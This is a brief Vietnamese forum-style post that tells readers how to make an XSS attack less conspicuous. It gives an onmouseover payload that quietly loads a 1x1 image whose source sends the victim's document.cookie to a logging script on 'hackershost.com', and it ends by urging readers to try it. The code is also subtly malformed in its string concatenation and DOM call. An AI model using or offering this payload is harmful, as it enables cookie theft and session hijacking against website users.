Nếu đã tấn công XSS thì không nên làm thế này.
Quá lộ liễu, và có thể bị người khác "châm"
Nên làm thế này
Code:
onmouseover="LukesObj=document.createElement('img'); LukesObj.style.width=1;LukesObj.style.height=1;LukesObj.src= 'http://hackershost.com/log.php?cookie'=document.cookie; document.body.insertBefore(LukesObj);"
Thử mà xem